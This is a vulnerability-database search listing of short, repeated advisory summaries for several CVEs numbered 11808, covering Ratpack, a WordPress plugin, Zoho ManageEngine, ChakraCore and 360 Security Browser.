CVE-2019-11808

Ratpack versions before 1.6.1 generate a session ID using a cryptographically weak PRNG in the JDK's ThreadLocalRandom. This means that if an attacker can determine a small window for the server start time and obtain a session ID value, they can theoretically determine the sequence of session IDs...

CVE-2024-11808

The Pingmeter Uptime Monitoring plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpnonce' parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject...

CVE-2024-11808

creationtimestamp| type| source ---|---|--- 2024-12-21 08:27:00+00:00| seen| https://infosec.exchange/users/cve/statuses/113689861780764620 2024-12-21 09:15:23+00:00| seen| https://bsky.app/profile/cve-notifications.bsky.social/post/3ldsktzmon52z 2024-12-21 11:09:07+00:00| seen|...

CVE-2024-11808

CVE-2024-11808 (Pingmeter Uptime Monitoring, WordPress) is a reflected XSS vulnerability in the Pingmeter Uptime Monitoring plugin for WordPress through the _wpnonce parameter, affecting all versions up to 1.0.3. The authenticated/unauthenticated risk is described as an attacker tricking a user i...

CVE-2024-11808 Pingmeter Uptime Monitoring <= 1.0.3 - Reflected Cross-Site Scripting

The Pingmeter Uptime Monitoring plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpnonce' parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject...

360 Security Browser suffers from dll hijacking vulnerability (CNVD-2021-11808)

360 Security Browser 360 Security Browser is a browser based on the dual kernel of IE and Chrome launched by 360 Security Center, which is a product of cooperation between Window of the World developer Phoenix Studio and 360 Security Center. 360 Security Browser has a dll hijacking vulnerability,...

Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in Ratpack

Summary IBM Watson Discovery for IBM Cloud Pak for Data contains a vulnerable version of Ratpack. Vulnerability Details CVEID: CVE-2019-11808 DESCRIPTION: Ratpack could allow a remote attacker to obtain sensitive information, caused by the use of a weak PRNG to generate session ID in JDK's...

com.github.grooviter:gql-ratpack (=0.5.0), io.ratpack:ratpack-pac4j (>=0.9.3 <=1.10.0-milestone-39) +3 more potentially affected by CVE-2019-11808 via io.ratpack:ratpack-session (>=0.9.10 <=1.6.0)

io.ratpack:ratpack-session MAVEN version =0.9.10, =0.9.3, =1.0.0, =1.10.0-milestone-1, =1.4.6, =3.0.0 Source cves: CVE-2019-11808 Source advisory: OSV:GHSA-54MG-VGRP-MWX9...

com.bytekast.serverless-local-apigateway:com.bytekast.serverless-local-apigateway.gradle.plugin (>=0.4 <=0.5), gradle.plugin.com.bytekast:serverless-local-apigateway (>=0.4 <=0.5) +1 more potentially affected by CVE-2019-11808 via io.ratpack:ratpack-groovy (>=0.9.0 <=1.6.0)

io.ratpack:ratpack-groovy MAVEN version =0.9.0, =0.4, =0.4, =0.9.0, =1.10.0-milestone-39 Source cves: CVE-2019-11808 Source advisory: OSV:GHSA-54MG-VGRP-MWX9...

CVE-2019-11808

CVE-2019-11808 affects Ratpack versions before 1.6.1, where session IDs are generated using a cryptographically weak PRNG in the JDK’s ThreadLocalRandom. The consequence is that if an attacker can narrow the server-start window and observe a session ID, they could theoretically determine the sequ...

CVE-2018-11808

Incorrect Access Control in CustomFieldsFeedServlet in Zoho ManageEngine Applications Manager Version 13 before build 13740 allows an attacker to delete any file and read certain files on the server in the context of the user which by default is "NT AUTHORITY / SYSTEM" by sending a specially...

CVE-2018-11808

Incorrect Access Control in CustomFieldsFeedServlet in Zoho ManageEngine Applications Manager Version 13 before build 13740 allows an attacker to delete any file and read certain files on the server in the context of the user which by default is "NT AUTHORITY / SYSTEM" by sending a specially...

CVE-2018-11808

Incorrect Access Control in CustomFieldsFeedServlet in Zoho ManageEngine Applications Manager Version 13 before build 13740 allows an attacker to delete any file and read certain files on the server in the context of the user which by default is "NT AUTHORITY / SYSTEM" by sending a specially...

CVE-2018-11808

CVE-2018-11808 affects Zoho ManageEngine Applications Manager 13 before build 13740, where the CustomFieldsFeedServlet has improper access control. An attacker can remotely craft a request to delete arbitrary files and read certain files on the server, running in the context of the default user N...

Memory corruption

ChakraCore and Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability"...

Memory corruption

ChakraCore and Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability"...

CVE-2017-11808

CVE-2017-11808 affects ChakraCore (and Microsoft Edge) on Windows 10 versions (Gold/1511/1607/1703) and Windows Server 2016. The root cause is memory handling in the ChakraCore scripting engine, described as a memory corruption/information disclosure vulnerability that could allow an attacker to ...